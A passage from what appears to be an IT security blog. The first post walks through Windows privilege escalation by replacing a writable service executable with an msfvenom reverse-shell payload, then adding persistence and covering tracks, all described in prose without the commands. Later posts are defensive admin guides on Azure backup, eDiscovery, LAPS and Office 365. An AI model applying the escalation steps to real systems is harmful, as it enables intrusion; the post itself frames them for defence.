Abusing Insecure Services to Gain Privilege Escalation and a Remote Shell

With each story of a new, brazen attack on an enterprise or government network by some “sophisticated” threat actor using “novel techniques”, the Twittersphere and public media outlets get whipped up into a fear induced frenzy. Questions about losing some kind of technology skills arms race and trendy new memes fly around the internet faster than any of us can keep up with. Let’s take a moment to look into a method these “sophisticated” attackers use to elevate and maintain access in their victims’ networks, then using this example, outline what we good guys need to do to make life difficult for those trying to exploit this attack vector.

Establishing a Foothold and Performing Reconnaissance

Attackers most commonly gain a foothold by abusing cloud services and pivoting to remote access, phishing, or just a good ole’ fashioned web drive-by. The method really doesn’t matter because the reality is, everyone clicks. Eventually, someone in your network will be lured into opening an attachment or clicking on a link and they will be compromised, and we can’t stop that.

Once the vulnerable user’s system has been compromised attackers will start to dig for information to discover the rest of the network and identify systems of interest. Once they gain access to one of these systems by exploiting a vulnerability or leveraging stolen credentials the real fun starts. What’s the big deal, right? They were able to RDP or gain terminal access to a server, but they don’t have elevated permission to actually accomplish anything there. We’ll see about that.

Let’s take a look at all services running on the machine and which executable those services actually run, focusing on anything outside of the system directory. The goal here is to identify software that might have been installed in a directory that you actually have access to.

Now that we’ve got a list of potential targets, let’s review the permissions on those executables to see if we have access to change them using icacls. In this particular case, the logged in user has FullControl (F) to the executable and we’re in luck!

Then, from our attack machine (running Kali Linux in this case) we’ll use msfvenom to create a payload that will run a reverse shell once executed. A few things to note here; msfvenom is part of the metasploit framework and simplifies creation of malicious payloads. In this case we’re specifying that we want a reverse shell, which malicious host to reach out to, on what port, and that we want the shell encoded with shikata ga nai to help evade modern detection:

Then we’ll move it over to the html directory to be hosted by the local Apache web server. Apache is installed by default in Kali so there’s not much magic here.

Then, using PowerShell we’ll download the malicious payload from our Apache instance. Note that we’re using powershell because it’s native to Windows and this method works because unfortunately, administrators often don’t restrict internet access to known good endpoints:

Remembering that our end goal is to abuse an insecure service to gain remote access and an elevated command shell, let’s take the known good executable run by the vulnerable service and rename it. We want to keep it around so we can clean up after ourselves later and hide that we were ever there!

And finally, we copy our malicious payload over to replace the original:

Great! Now, when the service restarts it’s going to execute our malicious payload and will reach out to the IP that we’ve specified to establish a remote shell, running with the permission that the service itself runs as… NT Authority\System!

And of course, on the other end, we need to have something listening to pick up the shell! Using Netcat we’ll open a simple listener, listening on the port that we specified when we created the malicious payload. With the Netcat listener in place, we’ll reboot the target machine to get the service to restart and for our payload to execute. With the shell established we can use ‘whoami’ to confirm that we’ve got elevated permissions on the target machine:

Finally, using our elevated access let’s create a little persistence with our remote shell before rolling back the changes to our vulnerable service and deleting the malicious payload to cover up and make it harder to see that we’ve been snooping around:

Why was this so easy and what can we do to protect from these types of attacks?

Well, the first and most obvious thing here is to make sure that our servers are only running software core to the functionality of the server. Leaving administrative tools in place leave a vulnerable footprint attackers can easily exploit. Tools like Wireshark or VMWare Tools can make administrative work more convenient, but often go unpatched and make our lives more difficult in the long run.

Obviously we need to patch our systems. But that doesn’t just mean Windows patches, that means EVERY piece of software on the system. Public exploit databases make software running on your servers a menu of juicy targets. Our vulnerable service may have been fixed in a recent patch!

Then finally, our servers should not be able to reach out to internet locations that are not explicitly trusted. Known public cloud services, windows update, threat monitoring tools, or any other cloud hosted management services should be the only place that servers are able to access. Initial access would have been significantly more complicated, and our reverse shell would not have worked at all in this case.

Protect Yourself From Ransomware With Azure System State Backup

With 2020 came a seemingly biblical stream of plagues. Obviously Covid-19, Murder Hornets, Social Unrest, and… Ransomware. Sure, ransomware isn’t a terribly new concept, but this year the ante has been upped significantly by the bad guys. Not only have crime groups become more brazen, they’re demanding far bigger ransoms causing cyber insurance companies and their unfortunate customers to struggle.

There are a million things that companies need to consider when it comes to protecting their infrastructure from ransomware, and maybe we’ll dive in a little further later, but today we’re going to spend some time talking about what you can do to make sure that you’re able to recover when every domain controller in your organization has been paved over with ransomware or destructive malware.

As you scream ‘But I have backups!’, you might want to stop for a second and think about those backups. Are they performed with an account that has access to everything else (I hope not)? Are the backups themselves stored in a place that’s susceptible to being encrypted? And how long will it take you to actually restore those backups?

Azure System State Backup

Taking advantage of Azure System State Backup is a great way to handle those concerns. The primary benefits here are that this solution involves a simple agent installed on a domain controller, doesn’t involve credentials of any kind, the backups are stored in an offsite location, and those backups are protected from tamper with a host of enhanced security features.

So let’s talk about configuration. Since we’re talking configuration of a critical resource, from a PAW (you ARE using PAWs, right?), we need to make sure that a recovery services vault is available in Azure.

Then, in that recovery services vault we’ll configure a backup:

Since a domain controller backup only involves the system state, it’s a simple configuration. A system state backup will ensure that Sysvol and registry configurations are retained.

then, when prompted, download the MARs agent and move it to the domain controller and start the install. The agent requires Visual C++ Runtime so if it’s not already installed, setup will take care of that for you.

then select where you’d like the agent to be installed:

Backups are shipped to Azure with encrypted, outbound connectivity initiated by the MARs agent. If you’d like to proxy that connectivity configure it next.

Make sure that the agent is configured to be able to update itself moving forward:

Then, finish the installation and the agent will prompt you to register it.

To register the agent you’ll need to go back to the backup that you configured in Azure and in the properties of the backup, ensure that you’ve declared you’re using the latest MARS agent, download the backup credentials, and transfer them to the Domain Controller you’re working on.

Select the previously exported credentials and move forward:

Next, you’ll need to generate a passphrase that will be used when restoring the backup. You can either specify your own, or let the setup generate one for you. Select Browse and specify where you’d like to export that passphrase. This needs to be protected because you won’t be able to restore if the secret is lost. Azure Key Vault (which we’ll talk about on a later date) is a great option here.

Now that registration is complete, you’ll want to schedule your backups. Open the Azure Backup agent and on the right side, select ‘Schedule Backup’.

Since we’re only backing up the system state, select ‘Add Items’ and ‘System State’.

Finally, ensure you’re taking daily backups and we’ll take a look at retention of those backups.

Retention depends entirely on your RTO/RPO strategy, but typically restoring a a domain to a point too far in the past has little value at all. I’ve chosen to perform daily backups and retain them for 14 days, but you might find it more reasonable to only maintain 7 days of daily backups, and maybe 4 single weekly backups to be used in fringe cases.

Finally, we confirm that the schedule is what we need it to be and move forward through the setup.

So there you have it. Nothing complicated at all and there are a handful of topics touched on that we’ll pick up later, but we’ve done some good work! Often, people use complicated or expensive backup/storage solutions that put them at risk for credential theft or data destruction in worst case scenarios. Azure System State Backup is neither expensive or complicated, but it ensures that you’ll be able quickly and confidently recover from disaster.

eDiscovery in Office 365

Now that we’ve spent a few minutes to go over data retention and destruction in the service to make sure you’re retaining the data that you’re obligated to keep, let’s take a bit of time to make sure you’re able to quickly and reliably identify information. Why? Because there are times where you’ll need to export copies of data for legal reasons, delete phishing attempts, or just to find out if a message was read by someone.

I’ll spend time outlining PowerShell syntax in the examples here to help cut down on human error. Most people who are adverse to using the command line are usually uncomfortable because the syntax is difficult to remember or the process seems more arcane. It’s often beneficial to leverage the shell for discovery to enable you to be more granular with your searches in order to reduce the cost of first pass litigation by outside council (the numbers are scary). It also allows you to efficiently document the search syntax to ensure reliable internal knowledge transfer and simplify repeated searches by allowing the individual performing the search to copy/paste the actual search commands.

Before you’ll even be able to connect to the service via PowerShell you’ll need to make sure that you have the right level of permission. With RBAC (Role Based Access Control) it’s possible to scope permissions within the compliance center to allow only eDiscovery to individuals who may not need access to things like email security settings or the audit log. In most cases, the eDiscovery Administrator role will be enough for discovery activities, but if those individuals also need to be able to purge data they’ll also need to have the “Search and Purge” role assigned which is only part of the Organization Management role by default. A little more information on those permissions can be found here and a quick reference on how to assign role group members to a role is included there as well. And since it’s easy for an attacker to use eDiscovery to exfiltrate data, don’t forget to make sure that individuals with eDiscovery permission are required to use multifactor authentication as well!

Now that you’ve got the permissions taken care of and we’ve touched on ensuring MFA is enabled, you’ll need to connect to the security and compliance center using the Exchange Online PowerShell module. Once the module is installed, it’s just a simple one line command to connect.

Connect-IPPSSession -UserPrincipalName matt@collab-crossroads.com

Once you’re connected, the syntax is simple. We’ll be working with

New-ComplianceSearch
command to identify the potentially malicious message below:

The search syntax is simple. We know the message we want to identify was sent on 4/4 and has ‘Test’ in the subject and body. We’re not sure who else might have gotten this particular message that we want to remove so we’ll check every mailbox in the organization using ‘All’ for the Exchange location. The search is boolean so there are a couple gotchyas every now and then. In this case, note the parenthesis around the sent and receive dates. We need to make sure that those are considered first, so we put them in a block before moving on to the less complicated key word search in the subject. We won’t get into complexities of script blocks, but in our case just know that it’s just like simple math; we calculate what’s in parenthesis first before moving on to the rest.

New-ComplianceSearch -Name "Test Search" -ExchangeLocation all -ContentMatchQuery '(sent>=04/01/2019 AND sent<=04/05/2019) AND subject:"Test"'

Once you’ve created the search, start it using:

Start-ComplianceSearch "Test Search"
Depending on how complex the search is it might take a while to complete. In our case it’s a single message in a single mailbox so it completes very quickly and you can see the results using:
Get-ComplianceSearch "Test Search"

There are a number of really handy metrics that Exchange will report on that you might be interested in from time to time. The obvious ones are who started the search, is it completed, how long did it take, and how many items did we find?

If you pipe the Get-ComplianceSearch command to FL it will format the results in list form and show you everything that you can select from. Since we only want a subset of these results you can select specific items in results of the previous command.

Now that we’ve confirmed the results are what I was looking for we can choose to take action on those results using the New-ComplianceSearchAction command. Before choosing to delete anything always make sure to preview and export a copy:

A couple things to note here, first we’re deduplicating results in the export using the -EnableDedupe parameter. Next, we’re choosing to export a PST per mailbox that the results are in using the -ArchiveFormat parameter. Since the compliance center temporarily stores the export in Azure blob storage, it’s not possible to actually download the export through PowerShell so we’ll go into the compliance center to actually download the report. Under Search and Investigation and Content Search you’ll see the search we just created. Selecting the Exports tab will show the export as well:

Since Google deprecated ClickOnce you’ll need to use Internet Explorer to install the small agent required to download the export. Once clicking the “Download results” button within the export request you’ll be prompted to install the agent. Then you’ll be prompted for the export key shown below as well as an export location to save your export.

Now that we’ve made sure that we’re deleting the right content and have a copy of that content, let’s go ahead and delete it. The New-ComplianceSearchAction command will be used here as well.

 New-ComplianceSearchAction -SearchName "Test Search" -Purge -PurgeType SoftDelete -confirm:$False 

After verifying that the action was completed using the Get-ComplianceSearchAction command, you can see that the message in question was indeed removed:

In this scenario we focused on deleting a potentially malicious email (phishing, malware, or malicious insider) from a mailbox. The process of exporting data for a litigation search is identical, with the exception that you’re not actually deleting the data. Next time we’ll take a look at using the threat explorer to accomplish the same activity!

Unique Local Admin Passwords – How and Why.

So here we are, early 2019 and just a few months removed from a data breach at Marriott that saw over 500 million guests’ personal information hit thSecurity_Oopsiese public internet. If that sounds like an insane number you’re absolutely right! That’s nearly 6% of the world population and about 150% the population of the US.

So the big question is how. How do things like this happen, how do attackers gain so much information, how do they exfiltrate the data, and how is it so common that Forbes is over here making cyber predictions for 2019!?

A while back I wrote about securing privileged access with a brief, high level overview of how an attacker will work to gain access in an organization and work to keep it. Part of that process is by making use of local admin credentials harvested from the first compromised machine to pivot around the network to see what else those credentials will work on. Sounds harmless enough, but what if the machine they gain access to is a domain controller? Or an admin’s workstation who happens to have administrative privileges on his daily account?

Security_killchain

During this process it’s difficult to detect because the attacker is using valid credentials to pivot around the network digging for more information or waiting for an admin to slip up. The first step to stopping this is by attacking the first link in the kill chain and limit privileged escalation of other workstations. How? By making sure that other workstation doesn’t have the same administrative password as the one the attacker already has.

Enter LAPS! The first part of the solution involves deploying an agent to each workstation and server on the network. That agent can be downloaded here. Since Microsoft was kind enough to provide the package as an MSI it’s easy enough to deploy with a script (msiexec /i \\fileserver\share\LAPS.x64.msi /quiet), Intune if you’re into comanagement, or good ole’ fashion SCCM. Definitely be sure to update your images to include the agent as well! Once that’s deployed and imaging has been updated, admin users need to install the management client on their PAWs (you are using a privileged access workstation, right?) to get the management client, powershell module, and GPO templates for management.

LAPS_AdminInstall

The next step is to make sure that the Active Directory Schema is taken care of. We need to extend the schema to include the attributes that we’ll be working with and then make sure to update permissions so we’ve accounted for users who shouldn’t be able to see those attributes. To extend the schema we need to use one of the admin workstations we just installed the management tools on and import the module in a powershell session and update the schema:

Import-module AdmPwd.PS
Update-AdmPwdADSchema

LAPS_SchemaExtension

After waiting a short while for that schema change to replicate we’ll move on to making sure only specific users and computers have access to the AD attribute that now stores these passwords. The first step is to remove permissions for groups at the OU level. If you’ve blocked inheritance you’ll need to make sure to take care of any nested OUs as well.

  1. Open ADSIEdit
  2. Right Click on the OU that contains the computer accounts that you are installing this solution on and select Properties.
  3. Click the Security tab
  4. Click Advanced
  5. Select the Group(s) or User(s) that you don’t want to be able to read the password and then click Edit.
  6. Uncheck All extended rights

*Be sure to preview all extended rights permissions first to make sure you aren’t removing permissions required by that group of users

LAPS_Security1

Now that we’ve taken care of scoping away permissions from unintended users/computers, we need need to make sure that the machines themselves have access to write to this attribute so they’re able to update their own passwords as they expire.

Set-AdmPwdComputerSelfPermission -OrgUnit "OU=Servers,DC=domain,DC=com"

LAPS_Security2

We’ll grant individual admin groups access to read those randomized admin passwords:

Set-AdmPwdReadPasswordPermission `
-OrgUnit "OU=Admins,DC=domain,DC=com" `
-AllowedPrincipals Domain\PasswordAdmins

And of course we need to account for password resets as well so let’s add reset permissions:

Set-AdmPwdResetPasswordPermission `
-OrgUnit "OU=Admins,DC=domain,DC=com" `
-AllowedPrincipals Domain\PasswordAdmins

Finally, you’ll want to hop into Group Policy on that admin workstation you installed the tools on to establish the password policy settings you’ll be enforcing on those workstations and servers.

LAPS_GroupPolicy

There’s quite a bit here to chew on but it’s not technically challenging so give it a try in a lab, then roll it out to your user workstations and eventually the servers as well! Again, the idea here is to limit lateral movement and make elevation of privilege more and more difficult for bad actors.

We’ll have another shorter session to go over some of the day to day admin tasks like looking up those passwords and resetting them, but that day is not today!

Securing Privileged Access – Part 1

After a little bit of a holiday hiatus we’re back to start a segment on securing privileged access. When we refer to privileged access we’re talking about everything from the different levels of administrative access, to privileged users who might handle extremely sensitive data for your organization.

So many organizations still believe that traditional firewalls are enough to keep the big, bad internet at bay. Well, in the modern enterprise it’s foolish to believe that you’re able to keep your data within any boundary while your users begin to work remotely, leverage third party SaaS storage (Dropbox, Google Drive, OneDrive, etc.), or you begin to host your data in an enterprise cloud like Office 365. I’m not here to tell you that those firewalls aren’t absolutely necessary, but it’s important to realize that the days of recognizing your firewall as the security boundary are over and you need to work hard to secure identity, regardless of where your data is hosted.

Recognizing that, let’s take a look at how a typical credential theft takes place in an organization:

Privsec_CredentialTheft

An attacker is going to establish a foothold in your organization by targeting end users with social engineering or phishing attacks. Once they’ve got access to that user’s computer they’ll start working on lateral movement, meaning that they’ll begin reaching out to other computers or servers on the network to see what else can be compromised. Maybe it’s by exploiting non unique local admin passwords, maybe the originally breached user has access elsewhere, or maybe an admin isn’t using a separate account for admin activities. Pivoting further and further until control of the directory database is gained (through actual domain admin permissions, by exploiting misconfigurations, or server agent configuration).

Privsec_Stage1

The first step is a simple one, and to many organizations it’s already very well ingrained in IT culture. Administrators need dedicated administrative accounts that are not shared with any other admins. I work with too many customers where this isn’t that case. Some have a generic account with domain admin that’s used for automation or just ‘general use’, or they flat out grant admin permission to their day to day account. Admin roles in your org should be reported on regularly to identify these and there should be alerts for elevation of privilege with an actual process for following up on those.

The next steps are again, not technically challenging but require culture change that many admins are adverse to. Privileged Access Workstations need to be deployed for users owning high value admin roles, and unique local admin passwords need to be deployed to workstations first and finally servers to help stop lateral movement. I’ll reach back to these two topics later with dedicated articles, but for now; know that it needs to be accomplished and needs to be prioritized.

Now that we’ve touched on high level goals of attackers and the first steps required to secure privileged access, I’ll follow up soon with part two. I’ll be working through Microsoft guidelines published here so definitely feel free to read ahead a little and ask questions!

Managing Major Changes to Office 365

Admins are expected to keep tabs on major changes to the service and understand how those could impact uptime, or just good ole’ fashioned end user experience. Unfortunately, there are hundreds of items coming down the pipe that may or may not be relevant to every organization and it’s difficult to follow it all.

The first part of making that manageable is understanding how Microsoft’s release options work. Updates are released to different update ‘Rings’ as the updates become more mature. The first three rings are Microsoft release teams where Microsoft consumes the updates first, prior to being formally released to the rest of the world.

M_O365_UpdateRings

After that, you can select to add friendlies to the targeted release group. These would typically be IT groups or power users who will be a little more adaptive to change. Here are a few of the benefits of making sure you have decision makers in the targeted release group:

  • Test and validate new updates before they are released to all the users in the organization.

  • Prepare user notification and documentation before updates are released worldwide.

  • Prepare internal help-desk for upcoming changes.

  • Go through compliance and security reviews.
  • Use feature controls, where applicable, to control the release of updates to end users.

Here’s how you can add individuals to targeted release.

Handy, right? Super common use case here; Teams were released about a year ago and most customers had no idea exactly how it would impact them or how their users would cope. The feature was added to enterprise licensing and enabled by default upon standard release. The trouble? End users were able to go to http://teams.microsoft.com and create a new one with any name and any picture which shows up in the address book with (at the time) no central management and can potentially be shared with the wide world of the internet. Mayyyybe you might want to review that feature to make sure you have controls in place that match your organization’s goals.

Facepalm

In addition to release options you’ll want make sure that your team is managing the message center for major updates.

M_O365_MessageCenter

Updates in the service come at you pretty fast, but Microsoft does a pretty decent job of providing information and allowing you to plan for them. Make sure you keep an eye on the roadmap, the message center, and of course make use of targeted release to find out how those changes will impact your users!

Now don’t mind me while I go drown myself in meaningless college football games!

Saturday

The Journey Begins

And here we are at the Crossroads of collaboration and productivity. With this little diddy I’ll make my foray into the wild, wild world of technical blogging.

I’ve been lucky enough to become an established engineer and have claimed some of the most iconic brands and organizations in the world as my customers in the last ten years. My goal is to share some of the knowledge I’ve gained along the way with hopefully, a bit of a smile as well.

Here you’ll find tips, tricks, and news about technical collaboration solutions used by organizations today. Everything from specific script samples, deployment guidance, and migration scenarios to major news released by industry leaders.

I’ll start with the message that struck me quite a while back and hope it does the same for you. Steve Jobs paid forward to the graduates of Stanford University in 2005 when he sent them off into the world with four words. Stay hungry, stay foolish.

For those of you who don’t recognize the reference, Steve was referencing the closing message of The Whole Earth Catalog. His message was one of ambition, living life, and embracing risk.

Education begins the gentleman, but reading, good company, and reflection must finish him. – John Locke

post